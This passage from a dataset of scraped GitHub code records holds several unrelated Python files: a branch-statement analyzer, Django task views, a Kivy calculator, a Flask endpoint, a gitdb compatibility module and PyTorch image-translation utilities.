strict)\n\n @classmethod\n def gt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n return cls(variable, Comparison.GTE, bound, strict)\n\n\n@dataclass\nclass BranchTree:\n \"\"\"Representation of a tree of conditional blocks.\n\n A tree represents an independent conditional statement i.e. a single if-else block. 
This tree\n has two sets of children, one of the conditional statements found in the true block of the\n conditional statement, and one of the conditional statements found in the false block.\n\n Attributes:\n condition: The boolean guard of the conditional block\n true_children: Sub-trees found in the block associated with the condition being true\n false_children: Sub-trees found in the block associated with the condition being false\n \"\"\"\n\n condition: Condition\n true_children: list[BranchTree]\n false_children: list[BranchTree]\n\n def as_kripke(self) -> list[Kripke[Condition]]:\n \"\"\"Convert tree of conditions into a Kripke Structure.\"\"\"\n\n if len(self.true_children) == 0:\n true_kripkes = [Kripke.singleton([self.condition])]\n else:\n true_kripkes = [\n kripke.add_labels([self.condition])\n for child in self.true_children\n for kripke in child.as_kripke()\n ]\n\n inv_cond = self.condition.inverse()\n\n if len(self.false_children) == 0:\n false_kripkes = [Kripke.singleton([inv_cond])]\n else:\n false_kripkes = [\n kripke.add_labels([inv_cond])\n for child in self.false_children\n for kripke in child.as_kripke()\n ]\n\n return [tk.join(fk) for tk in true_kripkes for fk in false_kripkes]\n\n @property\n def variables(self) -> set[str]:\n \"\"\"The set of variables depended on by the tree, including its children.\"\"\"\n\n variables = self.condition.variables\n\n for child in self.true_children:\n variables = variables.union(child.variables)\n\n for child in self.false_children:\n variables = variables.union(child.variables)\n\n return variables\n\n @staticmethod\n def from_function(func: Callable[..., Any]) -> list[BranchTree]:\n \"\"\"Create a set of BranchTrees from an arbitrary python function.\n\n The set of BranchTrees that represent all of the independent conditional statements in the\n function body. In other words, the size of the output set should be the same as the number\n of independent if-else blocks in the function. In order to analyze this function, the\n python source of the function should be available.\n\n Args:\n func: The python function to analyze\n\n Returns:\n A set of BranchTrees representing all independent conditional statements in the function\n\n Raises:\n OsError: If the source code of the function is not available\n \"\"\"\n\n mod_def = ast.parse(inspect.getsource(func))\n func_def = cast(ast.FunctionDef, mod_def.body[0])\n return _block_trees(func_def.body)\n\n\ndef _expr_trees(expr: ast.expr, tcs: list[BranchTree], fcs: list[BranchTree]) -> list[BranchTree]:\n \"\"\"Create a set of BranchTrees from a conditional statement expression.\n\n This function generates a set of trees in order to handle the cases in which the conditional\n statement expression contains either a boolean conjunction or disjunction operator. In the\n case of the conjunction, we traverse the set of operands generating a new tree with the operand\n as the condition and the previous tree as a true child. 
In the case of disjunction, we traverse\n the set of operands and create a new tree for each operand with the same children for each.\n\n Args:\n expr: The conditional statement expression\n tcs: The set of BranchTrees generated from the true block body\n fcs: The set of BranchTrees generated from the false block body\n\n Returns:\n A set of BranchTrees created from the expression\n\n Raises:\n TypeError: If the condition expression node is not a supported type\n \"\"\"\n # pylint: disable=W0105\n\n if not isinstance(expr, ast.BoolOp):\n condition = Condition.from_expr(expr)\n tree = BranchTree(condition, tcs, fcs)\n return [tree]\n\n if isinstance(expr.op, ast.And):\n \"\"\"In this case, we compose a single tree by iteratively stacking BranchTrees for each\n operand. We explore this approach in the following example.\n\n Given the following condition:\n\n if x <= 5 and y <= 10:\n do_true()\n else:\n do_false()\n\n We can see that this can be re-written as the following:\n\n if x <= 5:\n if y <= 10:\n do_true()\n else:\n do_false()\n else:\n do_false()\n\n The re-written condition can now be analyzed recursively to produce a BranchTree.\n \"\"\"\n\n init = _expr_trees(expr.values[-1], tcs, fcs)\n trees = reduce(lambda ts, e: _expr_trees(e, ts, []), reversed(expr.values[:-1]), init)\n return list(trees)\n\n if isinstance(expr.op, ast.Or):\n \"\"\"In this case, we create a set of trees by iterating over the set of operands and\n creating new trees with the same children. Consider the following example.\n\n Given the following condition:\n\n if x <= 5 or y <= 10:\n do_true()\n else:\n do_false()\n\n This can be re-written as the following:\n\n if x <= 5:\n do_true()\n else:\n do_false()\n\n if y <= 10:\n do_true()\n else:\n do_false()\n\n The re-written condition can now be analyzed into a set of independent BranchTrees.\n \"\"\"\n\n return [tree for e in expr.values for tree in _expr_trees(e, tcs, fcs)]\n\n raise TypeError(f\"Unsupported expression type {type(expr)}\")\n\n\ndef _block_trees(block: Sequence[ast.stmt]) -> list[BranchTree]:\n \"\"\"Create a set of trees from a block of python statements.\n\n Each BranchTree in the set represents an independent conditional statement in the block. 
The\n true and false blocks of each statement are recursively analyzed to find the child BranchTrees.\n\n Args:\n block: The set of python statements in the block\n\n Returns:\n A set of BranchTrees representing the independent conditional statements in the block\n \"\"\"\n\n block_trees = []\n conditions = [stmt for stmt in block if isinstance(stmt, ast.If)]\n\n for stmt in conditions:\n true_children = _block_trees(stmt.body)\n false_chilren = _block_trees(stmt.orelse)\n\n try:\n stmt_trees = _expr_trees(stmt.test, true_children, false_chilren)\n except InvalidConditionExpression:\n pass\n else:\n block_trees.extend(stmt_trees)\n\n return block_trees\n\n\ndef active_branches(kripke: Kripke[Condition], variables: dict[str, float]) -> list[State]:\n \"\"\"Compute branches that are active given a set of variables.\n\n Args:\n kripke: The kripke structure containing states representing conditional branches\n variables: The set of variable values the state labels depend on\n\n Returns:\n The list of states that are active given the set of variables.\n \"\"\"\n\n def is_active(state: State) -> bool:\n return all(label.is_true(variables) for label in kripke.labels_for(state))\n\n return [state for state in kripke.states if is_active(state)]\n\n\n__all__ = [\"BranchTree\", \"Comparison\", \"Condition\", \"active_branches\"]\n", "repo_name": "cpslab-asu/branch-statement-analyzer", "sub_path": "src/bsa/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 14114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 25, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 26, "usage_type": "call"}, {"api_name": "ast.cmpop", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ast.LtE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "ast.GtE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "ast.expr", "line_number": 162, "usage_type": "attribute"}, {"api_name": "ast.Compare", "line_number": 180, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Constant", "line_number": 188, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 190, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 192, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 193, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 197, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 201, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 91, "usage_type": "name"}, {"api_name": "kripke.Kripke.singleton", "line_number": 236, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 236, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 239, "usage_type": "call"}, {"api_name": "kripke.Kripke.singleton", "line_number": 247, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 247, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 250, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 272, "usage_type": "name"}, {"api_name": 
"typing.Any", "line_number": 272, "usage_type": "name"}, {"api_name": "ast.parse", "line_number": 290, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 290, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 291, "usage_type": "call"}, {"api_name": "ast.FunctionDef", "line_number": 291, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 214, "usage_type": "name"}, {"api_name": "ast.expr", "line_number": 295, "usage_type": "attribute"}, {"api_name": "ast.BoolOp", "line_number": 317, "usage_type": "attribute"}, {"api_name": "ast.And", "line_number": 322, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 347, "usage_type": "call"}, {"api_name": "ast.Or", "line_number": 350, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 381, "usage_type": "name"}, {"api_name": "ast.stmt", "line_number": 381, "usage_type": "attribute"}, {"api_name": "ast.If", "line_number": 395, "usage_type": "attribute"}, {"api_name": "kripke.Kripke", "line_number": 411, "usage_type": "name"}, {"api_name": "kripke.State", "line_number": 422, "usage_type": "name"}, {"api_name": "kripke.labels_for", "line_number": 423, "usage_type": "call"}, {"api_name": "kripke.states", "line_number": 425, "usage_type": "attribute"}, {"api_name": "kripke.State", "line_number": 411, "usage_type": "name"}]} +{"seq_id": "23740878730", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\nfrom django.views.generic import FormView\nfrom Home.forms import CustomUserCreationForm, TaskForm\nfrom django.contrib.auth import login\n\nfrom Home.models import Task\n# Create your views here.\n\nclass HomeView(TemplateView):\n template_name = \"home.html\"\n\nclass TasksView(FormView):\n template_name = \"tasks.html\"\n form_class = TaskForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.user = request.user\n task.save()\n return redirect(\"Tasks\")\n return render(request, self.template_name)\n\nclass RegisterView(FormView):\n template_name = \"registration/register.html\"\n form_class = CustomUserCreationForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(\"Home\")\n\nclass MusicView(TemplateView):\n template_name = \"music.html\"\n\ndef delete(request, id):\n task = Task.objects.get(id=id)\n task.delete()\n return HttpResponseRedirect(reverse('Tasks'))", "repo_name": "Mathis-Armstrong/TaskFocus", "sub_path": "Home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 15, "usage_type": "name"}, {"api_name": "Home.forms.TaskForm", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.views.generic.FormView", "line_number": 28, "usage_type": "name"}, {"api_name": "Home.forms.CustomUserCreationForm", "line_number": 30, "usage_type": "name"}, {"api_name": 
"django.contrib.auth.login", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 39, "usage_type": "name"}, {"api_name": "Home.models.Task.objects.get", "line_number": 43, "usage_type": "call"}, {"api_name": "Home.models.Task.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "Home.models.Task", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "4220175604", "text": "from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.utils import get_color_from_hex\n\n\nclass MainApp(App):\n\n def build(self):\n\n self.buttons = [[\"7\", \"8\", \"9\", \"/\"],\n [\"4\", \"5\", \"6\", \"*\"],\n [\"1\", \"2\", \"3\", \"-\"],\n [\".\", \"0\", \"C\", \"+\"],\n [\"=\"]\n ]\n self.operators = [\"/\", \"*\", \"-\", \"+\"]\n\n self.azul = '#56DEFF'\n\n self.solution = TextInput(readonly=True, text='')\n self.main_layout = BoxLayout(orientation=\"vertical\", spacing=10, padding=10)\n self.main_layout.add_widget(self.solution)\n self.equal_button = Button(text=\"=\", pos_hint={\"center_x\": .5, \"center_y\": .5})\n for row in self.buttons:\n r_layout = BoxLayout()\n for label in row:\n button = Button(text=label, pos_hint={\"center_x\": .5, \"center_y\": .5},\n background_color=get_color_from_hex(self.azul))\n\n button.bind(on_press=self.on_button_press)\n r_layout.add_widget(button)\n self.main_layout.add_widget(r_layout)\n\n return self.main_layout\n\n def on_button_press(self, instance):\n if instance.text != '=' and instance.text != 'C':\n self.solution.text += instance.text\n elif instance.text == 'C':\n self.solution.text = ''\n else:\n try:\n result = eval(self.solution.text)\n self.solution.text = str(result)\n print(result)\n except SyntaxError:\n print(\"Invalid syntax in expression\")\n\n\nif __name__ == '__main__':\n app = MainApp()\n app.run()\n", "repo_name": "alexandrecruzdev/Calculadora-Kivy-Python", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "kivy.app.App", "line_number": 8, "usage_type": "name"}, {"api_name": "kivy.uix.textinput.TextInput", "line_number": 22, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 23, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 25, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 27, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "kivy.utils.get_color_from_hex", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "26566118585", "text": "import sys\n\nPY3 = sys.version_info[0] == 3\n\ntry:\n from itertools import izip\n xrange = xrange\nexcept ImportError:\n # py3\n izip = zip\n xrange = range\n# end handle python version\n\ntry:\n # Python 2\n buffer = buffer\n memoryview = buffer\n # Assume no memory view ...\n def to_bytes(i):\n return i\nexcept NameError:\n # Python 3 has no `buffer`; only `memoryview`\n # However, it's faster to just slice the object directly, maybe it keeps a view 
internally\n def buffer(obj, offset, size=None):\n if size is None:\n # return memoryview(obj)[offset:]\n return obj[offset:]\n else:\n # return memoryview(obj)[offset:offset+size]\n return obj[offset:offset + size]\n # end buffer reimplementation\n # smmap can return memory view objects, which can't be compared as buffers/bytes can ... \n def to_bytes(i):\n if isinstance(i, memoryview):\n return i.tobytes()\n return i\n\n memoryview = memoryview\n\ntry:\n MAXSIZE = sys.maxint\nexcept AttributeError:\n MAXSIZE = sys.maxsize\n", "repo_name": "FelixZFB/Python_prevent_spider", "sub_path": "venv/Lib/site-packages/gitdb/utils/compat.py", "file_name": "compat.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 3, "usage_type": "attribute"}, {"api_name": "itertools.izip", "line_number": 10, "usage_type": "name"}, {"api_name": "sys.maxint", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "74357896486", "text": "from flask import Flask\nimport threading\nimport time\n\napp = Flask(__name__)\n\n\nt_buff = 0\nf_buff = 0\nh_buff = 0\n\n\n\n@app.route('/get_num_1', methods=[\"GET\"])\ndef get_num_1():\n with open('number.txt', 'r') as f:\n lines = f.readline() \n print(lines)\n t_buff = lines.split()[0]\n f_buff = lines.split()[1]\n h_buff = lines.split()[2]\n\n num_dict = {\n 't': t_buff,\n 'f': f_buff,\n 'h': h_buff,\n }\n return num_dict\n\n\n\n\n@app.route('/get_table', methods=[\"GET\"])\ndef get_table():\n v = {\n 'id': \"100\",\n 'First_Name': \"Y\",\n 'Last_Name': \"D\",\n \"User_Name\": \"C\"\n }\n return v\n\n\nif __name__ == '__main__':\n # t1 = threading.Thread(target=read_from_txt, )\n # t1.start()\n app.run()\n", "repo_name": "dc-ying/dashboard_ui", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "73361110888", "text": "# -*- coding: utf-8 -*-\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.optim import lr_scheduler\nfrom torchvision import transforms\nfrom data import ImageFilelist, ImageFolder\nimport torch\nimport torch.nn as nn\nimport os\nimport math\nimport torchvision.utils as vutils\nimport yaml\nimport numpy as np\nimport torch.nn.init as init\nimport time\nimport torchfile\nimport random\nimport pickle\nimport resnet\n# Methods\n# get_all_data_loaders : primary data loader interface (load trainA, testA, trainB, testB)\n# get_data_loader_list : list-based data loader\n# get_data_loader_folder : folder-based data loader\n# get_config : load yaml file\n# eformat :\n# write_2images : save output image\n# prepare_sub_folder : create checkpoints and images folders for saving outputs\n# write_one_row_html : write one row of the html file for output images\n# write_html : create the html file.\n# write_loss\n# slerp\n# get_slerp_interp\n# get_model_list\n# load_vgg16\n# load_inception\n# vgg_preprocess\n# get_scheduler\n# weights_init\n\ndef get_all_data_loaders(conf):\n batch_size = conf['batch_size']\n num_workers = conf['num_workers']\n if 'new_size' in conf:\n new_size_a = new_size_b = conf['new_size']\n else:\n new_size_a = conf['new_size_a']\n 
new_size_b = conf['new_size_b']\n height = conf['crop_image_height']\n width = conf['crop_image_width']\n # data loader\n train_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA'), batch_size, True,\n new_size_a, height, width, num_workers, True, True)\n test_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA'), batch_size, False,\n new_size_a, height, width, num_workers, True, True)\n train_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB'), batch_size, True,\n new_size_b, height, width, num_workers, True, True)\n test_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB'), batch_size, False,\n new_size_b, height, width, num_workers, True, True)\n train_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n train_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n test_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n train_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n train_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train','trainB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n test_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n\n return train_loader_a, train_loader_b, test_loader_a, test_loader_b, train_mask_loader_a, train_mask_loader_b,\\\n test_mask_loader_a, test_mask_loader_b, train_texture_loader_a, train_texture_loader_b, \\\n test_texture_loader_a, test_texture_loader_b\n\ndef get_data_loader_folder(input_folder, batch_size, train, new_size=None,\n height=256, width=256, num_workers=4, crop=True, not_mask=True):\n transform_list = [transforms.ToTensor()]\n transform_list = transform_list + [transforms.Normalize((0.5, 0.5, 0.5),(0.5, 0.5, 0.5))] if not_mask else transform_list\n transform_list = [transforms.CenterCrop((height, width))] + transform_list if crop else transform_list\n transform_list = [transforms.Resize(new_size)] + transform_list if new_size is not None else transform_list\n # transform_list = [transforms.RandomHorizontalFlip()] + transform_list if train else transform_list\n transform = transforms.Compose(transform_list)\n dataset = ImageFolder(input_folder, transform=transform)\n loader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=False, drop_last=True, num_workers=num_workers)\n return loader\n\n\ndef get_config(config):\n with open(config, 'r') as stream:\n return yaml.load(stream)\n\n\ndef eformat(f, prec):\n s = \"%.*e\"%(prec, f)\n mantissa, exp = s.split('e')\n # add 1 to 
digits as 1 is taken by sign +/-\n return \"%se%d\"%(mantissa, int(exp))\n\n\ndef __write_images(image_outputs, display_image_num, file_name):\n image_outputs = [images.expand(-1, 3, -1, -1) for images in image_outputs] # expand gray-scale images to 3 channels\n image_tensor = torch.cat([images[:display_image_num] for images in image_outputs], 0)\n image_grid = vutils.make_grid(image_tensor.data, nrow=display_image_num, padding=0, normalize=True, scale_each=True)\n vutils.save_image(image_grid, file_name, nrow=1)\n\n\ndef write_2images(image_outputs, display_image_num, image_directory, postfix):\n n = len(image_outputs)\n __write_images(image_outputs[0:n//2], display_image_num, '%s/gen_a2b_%s.jpg' % (image_directory, postfix))\n __write_images(image_outputs[n//2:n], display_image_num, '%s/gen_b2a_%s.jpg' % (image_directory, postfix))\n\n\ndef prepare_sub_folder(output_directory):\n image_directory = os.path.join(output_directory, 'images')\n if not os.path.exists(image_directory):\n print(\"Creating directory: {}\".format(image_directory))\n os.makedirs(image_directory)\n checkpoint_directory = os.path.join(output_directory, 'checkpoints')\n if not os.path.exists(checkpoint_directory):\n print(\"Creating directory: {}\".format(checkpoint_directory))\n os.makedirs(checkpoint_directory)\n return checkpoint_directory, image_directory\n\n\ndef write_one_row_html(html_file, iterations, img_filename, all_size):\n html_file.write(\"

iteration [%d] (%s)

\" % (iterations,img_filename.split('/')[-1]))\n html_file.write(\"\"\"\n

\n \n
\n

\n \"\"\" % (img_filename, img_filename, all_size))\n return\n\n\ndef write_html(filename, iterations, image_save_iterations, image_directory, all_size=1536):\n html_file = open(filename, \"w\")\n html_file.write('''\n \n \n \n Experiment name = %s\n \n \n \n ''' % os.path.basename(filename))\n html_file.write(\"

current

\")\n write_one_row_html(html_file, iterations, '%s/gen_a2b_train_current.jpg' % (image_directory), all_size)\n write_one_row_html(html_file, iterations, '%s/gen_b2a_train_current.jpg' % (image_directory), all_size)\n for j in range(iterations, image_save_iterations-1, -1):\n if j % image_save_iterations == 0:\n write_one_row_html(html_file, j, '%s/gen_a2b_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_a2b_train_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_train_%08d.jpg' % (image_directory, j), all_size)\n html_file.write(\"\")\n html_file.close()\n\n\ndef write_loss(iterations, trainer, train_writer):\n members = [attr for attr in dir(trainer) \\\n if not callable(getattr(trainer, attr)) and not attr.startswith(\"__\") and ('loss' in attr or 'grad' in attr or 'nwd' in attr)]\n for m in members:\n train_writer.add_scalar(m, getattr(trainer, m), iterations + 1)\n\n\ndef slerp(val, low, high):\n \"\"\"\n original: Animating Rotation with Quaternion Curves, Ken Shoemake\n https://arxiv.org/abs/1609.04468\n Code: https://github.com/soumith/dcgan.torch/issues/14, Tom White\n \"\"\"\n omega = np.arccos(np.dot(low / np.linalg.norm(low), high / np.linalg.norm(high)))\n so = np.sin(omega)\n return np.sin((1.0 - val) * omega) / so * low + np.sin(val * omega) / so * high\n\n\ndef get_slerp_interp(nb_latents, nb_interp, z_dim):\n \"\"\"\n modified from: PyTorch inference for \"Progressive Growing of GANs\" with CelebA snapshot\n https://github.com/ptrblck/prog_gans_pytorch_inference\n \"\"\"\n\n latent_interps = np.empty(shape=(0, z_dim), dtype=np.float32)\n for _ in range(nb_latents):\n low = np.random.randn(z_dim)\n high = np.random.randn(z_dim) # low + np.random.randn(512) * 0.7\n interp_vals = np.linspace(0, 1, num=nb_interp)\n latent_interp = np.array([slerp(v, low, high) for v in interp_vals],\n dtype=np.float32)\n latent_interps = np.vstack((latent_interps, latent_interp))\n\n return latent_interps[:, :, np.newaxis, np.newaxis]\n\n\n# Get model list for resume\ndef get_model_list(dirname, key):\n if os.path.exists(dirname) is False:\n return None\n gen_models = [os.path.join(dirname, f) for f in os.listdir(dirname) if\n os.path.isfile(os.path.join(dirname, f)) and key in f and \".pt\" in f]\n if gen_models is None:\n return None\n gen_models.sort()\n last_model_name = gen_models[-1]\n return last_model_name\n\n\ndef load_resnet50(model_dir):\n model = resnet.resnet50()\n load_state_dict(model, model_dir)\n return model\n\ndef load_inception(model_path):\n state_dict = torch.load(model_path)\n model = inception_v3(pretrained=False, transform_input=True)\n model.aux_logits = False\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, state_dict['fc.weight'].size(0))\n model.load_state_dict(state_dict)\n for param in model.parameters():\n param.requires_grad = False\n return model\n\ndef vgg_preprocess(batch):\n tensortype = type(batch.data)\n (r, g, b) = torch.chunk(batch, 3, dim = 1)\n batch = torch.cat((b, g, r), dim = 1) # convert RGB to BGR\n batch = (batch + 1) * 255 * 0.5 # [-1, 1] -> [0, 255]\n mean = tensortype(batch.data.size()).cuda()\n mean[:, 0, :, :] = 103.939\n mean[:, 1, :, :] = 116.779\n mean[:, 2, :, :] = 123.680\n batch = batch.sub(Variable(mean)) # subtract mean\n return batch\n\n\ndef get_scheduler(optimizer, hyperparameters, iterations=-1):\n if 'lr_policy' not in 
hyperparameters or hyperparameters['lr_policy'] == 'constant':\n scheduler = None # constant scheduler\n elif hyperparameters['lr_policy'] == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=hyperparameters['step_size'],\n gamma=hyperparameters['gamma'], last_epoch=iterations)\n else:\n return NotImplementedError('learning rate policy [%s] is not implemented', hyperparameters['lr_policy'])\n return scheduler\n\n\ndef weights_init(init_type='gaussian'):\n def init_fun(m):\n classname = m.__class__.__name__\n if (classname.find('Conv') == 0 or classname.find('Linear') == 0) and hasattr(m, 'weight'):\n # print m.__class__.__name__\n if init_type == 'gaussian':\n init.normal_(m.weight.data, 0.0, 0.02)\n elif init_type == 'xavier':\n init.xavier_normal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'kaiming':\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\n elif init_type == 'orthogonal':\n init.orthogonal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'default':\n pass\n else:\n assert 0, \"Unsupported initialization: {}\".format(init_type)\n if hasattr(m, 'bias') and m.bias is not None:\n init.constant_(m.bias.data, 0.0)\n\n return init_fun\n\n\nclass Timer:\n def __init__(self, msg):\n self.msg = msg\n self.start_time = None\n\n def __enter__(self):\n self.start_time = time.time()\n\n def __exit__(self, exc_type, exc_value, exc_tb):\n print(self.msg % (time.time() - self.start_time))\n\n\ndef pytorch03_to_pytorch04(state_dict_base, trainer_name):\n def __conversion_core(state_dict_base, trainer_name):\n state_dict = state_dict_base.copy()\n if trainer_name == 'IPMNet':\n for key, value in state_dict_base.items():\n if key.endswith(('enc_content.model.0.norm.running_mean',\n 'enc_content.model.0.norm.running_var',\n 'enc_content.model.1.norm.running_mean',\n 'enc_content.model.1.norm.running_var',\n 'enc_content.model.2.norm.running_mean',\n 'enc_content.model.2.norm.running_var',\n 'enc_content.model.3.model.0.model.1.norm.running_mean',\n 'enc_content.model.3.model.0.model.1.norm.running_var',\n 'enc_content.model.3.model.0.model.0.norm.running_mean',\n 'enc_content.model.3.model.0.model.0.norm.running_var',\n 'enc_content.model.3.model.1.model.1.norm.running_mean',\n 'enc_content.model.3.model.1.model.1.norm.running_var',\n 'enc_content.model.3.model.1.model.0.norm.running_mean',\n 'enc_content.model.3.model.1.model.0.norm.running_var',\n 'enc_content.model.3.model.2.model.1.norm.running_mean',\n 'enc_content.model.3.model.2.model.1.norm.running_var',\n 'enc_content.model.3.model.2.model.0.norm.running_mean',\n 'enc_content.model.3.model.2.model.0.norm.running_var',\n 'enc_content.model.3.model.3.model.1.norm.running_mean',\n 'enc_content.model.3.model.3.model.1.norm.running_var',\n 'enc_content.model.3.model.3.model.0.norm.running_mean',\n 'enc_content.model.3.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n else:\n def __conversion_core(state_dict_base):\n state_dict = state_dict_base.copy()\n for key, value in state_dict_base.items():\n if key.endswith(('enc.model.0.norm.running_mean',\n 'enc.model.0.norm.running_var',\n 'enc.model.1.norm.running_mean',\n 'enc.model.1.norm.running_var',\n 'enc.model.2.norm.running_mean',\n 'enc.model.2.norm.running_var',\n 'enc.model.3.model.0.model.1.norm.running_mean',\n 'enc.model.3.model.0.model.1.norm.running_var',\n 'enc.model.3.model.0.model.0.norm.running_mean',\n 'enc.model.3.model.0.model.0.norm.running_var',\n 'enc.model.3.model.1.model.1.norm.running_mean',\n 
